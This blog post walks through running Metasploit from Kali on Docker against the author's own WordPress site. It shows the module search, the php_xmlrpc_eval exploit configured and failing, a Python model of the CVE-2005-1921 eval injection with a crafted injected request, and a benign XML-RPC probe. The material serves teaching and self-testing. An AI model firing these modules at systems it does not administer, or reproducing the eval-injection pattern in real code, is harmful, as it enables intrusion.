Attacking my own site with Metasploit

  • Category: security

※ Carrying out what is described in this article against systems you do not administer, without permission, is illegal. Never do it. ※
The steps below continue from my earlier post, Starting Kali Linux on Docker for Windows.
Calling it an attack is generous: all I did was run one exploit module against xmlrpc.php.

Preparation

PS C:\Users\shimizu> docker exec -it (container ID) /bin/bash

root@81c581d5cf43:/# apt-get update && apt-get -y upgrade && apt-get install -y kali-linux-web
...(restart the container after the upgrade is applied)

root@81c581d5cf43:/# /etc/init.d/postgresql start
Starting PostgreSQL 12 database server: main.

root@81c581d5cf43:/# update-rc.d postgresql enable

root@81c581d5cf43:/# msfdb init
...

Running Metasploit

root@81c581d5cf43:/# msfconsole

               .;lxO0KXXXK0Oxl:.
           ,o0WMMMMMMMMMMMMMMMMMMKd,
        'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo
  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk
 oMMMMMMMMMMx.                    dMMMMMMMMMMx
.WMMMMMMMMM:                       :MMMMMMMMMM,
xMMMMMMMMMo                         lMMMMMMMMMO
NMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd                        ,0MMMMMMMMMMK;
.WMMMMMMMMMc                         'OMMMMMM0,
 lMMMMMMMMMMk.                         .kMMO'
  dMMMMMMMMMMWd'                         ..
   cWMMMMMMMMMMMNxc'.                ##########
    .0MMMMMMMMMMMMMMMMWc            #+#    #+#
      ;0MMMMMMMMMMMMMMMo.          +:+
        .dNMMMMMMMMMMMMo          +#++:++#+
           'oOWMMMMMMMMo                +:+
               .,cdkO0K;        :+:    :+:
                                :::::::+:
                      Metasploit

       =[ metasploit v5.0.66-dev                          ]
+ -- --=[ 1956 exploits - 1092 auxiliary - 336 post       ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Search for WordPress exploits

The search is restricted to modules ranked excellent. A bare keyword such as wordpress is matched against several metadata fields (name, description, references, authors), not only the module name, which is why a few modules unrelated to WordPress also turn up. The Check column shows which modules can test for the flaw without firing the exploit.

msf5 > search rank:excellent wordpress

Matching Modules
================

   #   Name                                                           Disclosure Date  Rank       Check  Description
   -   ----                                                           ---------------  ----       -----  -----------
   0   exploit/freebsd/local/rtld_execl_priv_esc                      2009-11-30       excellent  Yes    FreeBSD rtld execl() Privilege Escalation
   1   exploit/multi/http/wp_crop_rce                                 2019-02-19       excellent  Yes    WordPress Crop-image Shell Upload
   2   exploit/multi/http/wp_db_backup_rce                            2019-04-24       excellent  Yes    WP Database Backup RCE
   3   exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload  2016-05-04       excellent  Yes    WordPress Ninja Forms Unauthenticated File Upload
   4   exploit/multi/http/wp_responsive_thumbnail_slider_upload       2015-08-28       excellent  Yes    WordPress Responsive Thumbnail Slider Arbitrary File Upload
   5   exploit/unix/webapp/joomla_akeeba_unserialize                  2014-09-29       excellent  Yes    Joomla Akeeba Kickstart Unserialize Remote Code Execution
   6   exploit/unix/webapp/jquery_file_upload                         2018-10-09       excellent  Yes    blueimp's jQuery (Arbitrary) File Upload
   7   exploit/unix/webapp/php_xmlrpc_eval                            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution
   8   exploit/unix/webapp/wp_admin_shell_upload                      2015-02-21       excellent  Yes    WordPress Admin Shell Upload
   9   exploit/unix/webapp/wp_advanced_custom_fields_exec             2012-11-14       excellent  Yes    WordPress Plugin Advanced Custom Fields Remote File Inclusion
   10  exploit/unix/webapp/wp_ajax_load_more_file_upload              2015-10-10       excellent  Yes    WordPress Ajax Load More PHP Upload Vulnerability
   11  exploit/unix/webapp/wp_asset_manager_upload_exec               2012-05-26       excellent  Yes    WordPress Asset-Manager PHP File Upload Vulnerability
   12  exploit/unix/webapp/wp_creativecontactform_file_upload         2014-10-22       excellent  Yes    WordPress Creative Contact Form Upload Vulnerability
   13  exploit/unix/webapp/wp_downloadmanager_upload                  2014-12-03       excellent  Yes    WordPress Download Manager (download-manager) Unauthenticated File Upload
   14  exploit/unix/webapp/wp_easycart_unrestricted_file_upload       2015-01-08       excellent  No     WordPress WP EasyCart Unrestricted File Upload
   15  exploit/unix/webapp/wp_foxypress_upload                        2012-06-05       excellent  Yes    WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution
   16  exploit/unix/webapp/wp_frontend_editor_file_upload             2012-07-04       excellent  Yes    WordPress Front-end Editor File Upload
   17  exploit/unix/webapp/wp_holding_pattern_file_upload             2015-02-11       excellent  Yes    WordPress Holding Pattern Theme Arbitrary File Upload
   18  exploit/unix/webapp/wp_inboundio_marketing_file_upload         2015-03-24       excellent  Yes    WordPress InBoundio Marketing PHP Upload Vulnerability
   19  exploit/unix/webapp/wp_infusionsoft_upload                     2014-09-25       excellent  Yes    WordPress InfusionSoft Upload Vulnerability
   20  exploit/unix/webapp/wp_lastpost_exec                           2005-08-09       excellent  No     WordPress cache_lastpostdate Arbitrary Code Execution
   21  exploit/unix/webapp/wp_mobile_detector_upload_execute          2016-05-31       excellent  Yes    WordPress WP Mobile Detector 3.5 Shell Upload
   22  exploit/unix/webapp/wp_nmediawebsite_file_upload               2015-04-12       excellent  Yes    WordPress N-Media Website Contact Form Upload Vulnerability
   23  exploit/unix/webapp/wp_optimizepress_upload                    2013-11-29       excellent  Yes    WordPress OptimizePress Theme File Upload Vulnerability
   24  exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload  2014-11-11       excellent  Yes    WordPress Photo Gallery Unrestricted File Upload
   25  exploit/unix/webapp/wp_pixabay_images_upload                   2015-01-19       excellent  Yes    WordPress Pixabay Images PHP Code Upload
   26  exploit/unix/webapp/wp_plainview_activity_monitor_rce          2018-08-26       excellent  Yes    WordPress Plainview Activity Monitor RCE
   27  exploit/unix/webapp/wp_platform_exec                           2015-01-21       excellent  No     WordPress Platform Theme File Upload Vulnerability
   28  exploit/unix/webapp/wp_property_upload_exec                    2012-03-26       excellent  Yes    WordPress WP-Property PHP File Upload Vulnerability
   29  exploit/unix/webapp/wp_reflexgallery_file_upload               2012-12-30       excellent  Yes    WordPress Reflex Gallery Upload Vulnerability
   30  exploit/unix/webapp/wp_revslider_upload_execute                2014-11-26       excellent  Yes    WordPress RevSlider File Upload and Execute Vulnerability
   31  exploit/unix/webapp/wp_slideshowgallery_upload                 2014-08-28       excellent  Yes    WordPress SlideShow Gallery Authenticated File Upload
   32  exploit/unix/webapp/wp_symposium_shell_upload                  2014-12-11       excellent  Yes    WordPress WP Symposium 14.11 Shell Upload
   33  exploit/unix/webapp/wp_total_cache_exec                        2013-04-17       excellent  Yes    WordPress W3 Total Cache PHP Code Execution
   34  exploit/unix/webapp/wp_worktheflow_upload                      2015-03-14       excellent  Yes    WordPress Work The Flow Upload Vulnerability
   35  exploit/unix/webapp/wp_wpshop_ecommerce_file_upload            2015-03-09       excellent  Yes    WordPress WPshop eCommerce Arbitrary File Upload Vulnerability
   36  exploit/unix/webapp/wp_wptouch_file_upload                     2014-07-14       excellent  Yes    WordPress WPTouch Authenticated File Upload
   37  exploit/unix/webapp/wp_wysija_newsletters_upload               2014-07-01       excellent  Yes    WordPress MailPoet Newsletters (wysija-newsletters) Unauthenticated File Upload
   38  exploit/windows/fileformat/ms12_005                            2012-01-10       excellent  No     MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability
   39  exploit/windows/fileformat/winrar_name_spoofing                2009-09-28       excellent  No     WinRAR Filename Spoofing

Select php_xmlrpc_eval and show its info

msf5 > use exploit/unix/webapp/php_xmlrpc_eval

msf5 exploit(unix/webapp/php_xmlrpc_eval) > info

       Name: PHP XML-RPC Arbitrary Code Execution
     Module: exploit/unix/webapp/php_xmlrpc_eval
   Platform: Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2005-06-29

Provided by:
  hdm <x@hdm.io>
  cazz <bmc@shmoo.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  PATH     /xmlrpc.php      yes       Path to xmlrpc.php
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    80               yes       The target port (TCP)
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host

Payload information:
  Space: 512

Description:
  This module exploits an arbitrary code execution flaw discovered in
  many implementations of the PHP XML-RPC module. This flaw is
  exploitable through a number of PHP web applications, including but
  not limited to Drupal, WordPress, Postnuke, and TikiWiki.

References:
  https://cvedetails.com/cve/CVE-2005-1921/
  OSVDB (17793)
  http://www.securityfocus.com/bid/14088
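The info output says only "arbitrary code execution". The reference, CVE-2005-1921, is an eval injection: the affected PHP XML-RPC library assembled PHP source text from the incoming request and handed it to eval(), so a single quote inside a struct member's `<name>` closed the generated string and everything after it ran as PHP. The Python below is an added illustration of that bug class, written for this page; it is neither the PHP library's code nor the Metasploit module's payload. The two requests, the function names and the harmless side effect (appending to a list) are constructed for the example. It shows a decoder that builds a dict literal as text and eval()s it, the same request parsed by Python's real XML-RPC unmarshaller, and that only the former executes the injected expression.

```python
"""Python model of the bug class behind CVE-2005-1921 (eval injection in XML-RPC
decoding). Added illustration written for this page; it is NOT the PHP XML-RPC
library's code and NOT the Metasploit module's payload."""
import xml.etree.ElementTree as ET
import xmlrpc.client

# Records whether injected code executed. The injected payload below only appends
# to this list; a real exploit would run arbitrary commands instead.
SIDE_EFFECTS: list = []

# Constructed sample: a well-formed, harmless request.
BENIGN = b"""<?xml version="1.0"?>
<methodCall><methodName>demo.echo</methodName><params><param><value><struct>
<member><name>greeting</name><value><string>hello</string></value></member>
</struct></value></param></params></methodCall>"""

# Constructed sample: the member <name> contains a quote that closes the key
# string in the generated source, then an expression of the attacker's choosing,
# then re-opens a (now empty) key so the literal stays syntactically valid.
INJECTED = b"""<?xml version="1.0"?>
<methodCall><methodName>demo.echo</methodName><params><param><value><struct>
<member><name>x': SIDE_EFFECTS.append('code ran'), '</name><value><string>hello</string></value></member>
</struct></value></param></params></methodCall>"""


def vulnerable_decode(request: bytes) -> dict:
    """Builds a dict *as source text* from the request and eval()s it.

    This is the shape of the 2005 flaw: the decoder assembled code from the XML
    and evaluated it, so whoever controls <name> controls the code.
    """
    root = ET.fromstring(request)
    parts = []
    for member in root.iter("member"):
        name = member.findtext("name", default="")
        value = member.findtext("value/string", default="")
        parts.append(f"'{name}': {value!r}")   # name is pasted in unescaped
    source = "{" + ", ".join(parts) + "}"
    return eval(source)                         # deliberately unsafe: that is the bug


def safe_decode(request: bytes) -> dict:
    """Parses the same request with a real XML-RPC unmarshaller: member names
    become dict keys as data, and nothing is ever evaluated as code."""
    params, _method = xmlrpc.client.loads(request)
    return params[0]


def injection_ran(decoder) -> bool:
    """Feeds the INJECTED request to `decoder` and reports whether the payload executed."""
    SIDE_EFFECTS.clear()
    decoder(INJECTED)
    return bool(SIDE_EFFECTS)


if __name__ == "__main__":
    print("vulnerable, benign request    :", vulnerable_decode(BENIGN))
    print("vulnerable, injected ran code :", injection_ran(vulnerable_decode))
    print("safe, injected ran code       :", injection_ran(safe_decode))
    print("safe, injected parsed as data :", safe_decode(INJECTED))
```

The fix in 2005 was the same in spirit as `safe_decode`: stop generating code from the document and unmarshal it into data structures instead. Any decoder that concatenates untrusted input into something later passed to eval(), whatever the language, has this hole.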

Set the options and run

The WordPress install used here is not vulnerable to this 2005 flaw, so the exploit fails. Note the reason reported below, "no response": the module did not get an HTTP reply back within its timeout, which is also what a WAF that drops the request, a firewall or a plain network problem would produce, so on its own it is not proof that the target is patched. Since the module lists Check: Yes, running check before exploit is the cleaner way to confirm.

msf5 exploit(unix/webapp/php_xmlrpc_eval) > set RHOSTS tech.akat.info
RHOSTS => tech.akat.info

msf5 exploit(unix/webapp/php_xmlrpc_eval) > set RPORT 443
RPORT => 443

msf5 exploit(unix/webapp/php_xmlrpc_eval) > set SSL true
SSL => true

msf5 exploit(unix/webapp/php_xmlrpc_eval) > show options

Module options (exploit/unix/webapp/php_xmlrpc_eval):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PATH     /xmlrpc.php      yes       Path to xmlrpc.php
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   tech.akat.info   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    443              yes       The target port (TCP)
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(unix/webapp/php_xmlrpc_eval) > exploit
...
[-] exploit failed: no response
[*] Exploit completed, but no session was created.
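Before trusting a "no response" result, it helps to know what /xmlrpc.php actually answers. As an added example for this page (not part of the original post or of Metasploit), the following Python sends `system.listMethods`, a standard XML-RPC introspection call that WordPress answers without credentials whenever xmlrpc.php is enabled, and classifies the reply: reachable and XML-RPC alive, reachable but blocked or not served, or no HTTP answer at all. The target URL defaults to the post's own site and must be changed to a host you administer; the sample response bodies and the function names are my own constructions so the classifier can be exercised offline.

```python
"""Check what /xmlrpc.php actually answers before (or after) running an exploit
module against it. Added example for this page, not part of the original post or of
Metasploit. Target URL, sample responses and function names are my own choices."""
import urllib.error
import urllib.request
import xmlrpc.client
from dataclasses import dataclass

# The post's own site; replace with a WordPress host you administer.
TARGET = "https://tech.akat.info/xmlrpc.php"


@dataclass
class Verdict:
    reachable: bool        # did we get any HTTP answer at all
    xmlrpc_enabled: bool   # did the body parse as an XML-RPC response
    detail: str


def build_list_methods_request() -> bytes:
    """system.listMethods is standard XML-RPC introspection; WordPress answers it
    without credentials whenever xmlrpc.php is enabled."""
    return xmlrpc.client.dumps((), methodname="system.listMethods").encode()


def classify_response(status: int, body: bytes) -> Verdict:
    """Turn an HTTP status and body into a verdict. An exploit module's
    'no response' can hide any of the non-enabled cases below."""
    if status in (401, 403):
        return Verdict(True, False, f"HTTP {status}: xmlrpc.php blocked (WAF, .htaccess or plugin)")
    if status == 404:
        return Verdict(True, False, "HTTP 404: xmlrpc.php not served at this path")
    if status != 200:
        return Verdict(True, False, f"HTTP {status}: unexpected status")
    try:
        params, _ = xmlrpc.client.loads(body)
    except xmlrpc.client.Fault as fault:
        # A fault is still a genuine XML-RPC answer: the endpoint is alive.
        return Verdict(True, True, f"XML-RPC fault {fault.faultCode}: {fault.faultString}")
    except Exception as exc:  # HTML error page, empty body, non-XML stub, ...
        return Verdict(True, False, f"HTTP 200 but not an XML-RPC response ({type(exc).__name__})")
    methods = list(params[0]) if params else []
    return Verdict(True, True, f"XML-RPC enabled, {len(methods)} methods, e.g. {methods[:3]}")


def probe(url: str = TARGET, timeout: float = 10.0) -> Verdict:
    """Send the request over the network. Only point this at hosts you administer."""
    req = urllib.request.Request(url, data=build_list_methods_request(),
                                 headers={"Content-Type": "text/xml"}, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify_response(resp.status, resp.read())
    except urllib.error.HTTPError as err:
        return classify_response(err.code, err.read())
    except (urllib.error.URLError, OSError) as err:
        # This is the case Metasploit reported above: nothing came back at all.
        return Verdict(False, False, f"no response: {err}")


# Constructed sample bodies, so the classifier can be exercised offline.
SAMPLE_OK = xmlrpc.client.dumps(
    (["system.listMethods", "wp.getPosts", "pingback.ping"],), methodresponse=True).encode()
SAMPLE_FAULT = xmlrpc.client.dumps(  # constructed; modelled on a plugin that switches XML-RPC off
    xmlrpc.client.Fault(405, "XML-RPC services are disabled on this site."), methodresponse=True).encode()
SAMPLE_HTML = b"<html><body><h1>403 Forbidden</h1></body></html>"

if __name__ == "__main__":
    print(probe())
```

If `probe()` itself returns "no response", the exploit module's result says nothing about the WordPress version: fix reachability first. If it returns a method list, the endpoint is live and a failed exploit or a negative `check` does mean the flaw is not there.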

Supplement: exploit information can also be browsed through a web GUI

https://www.exploit-db.com/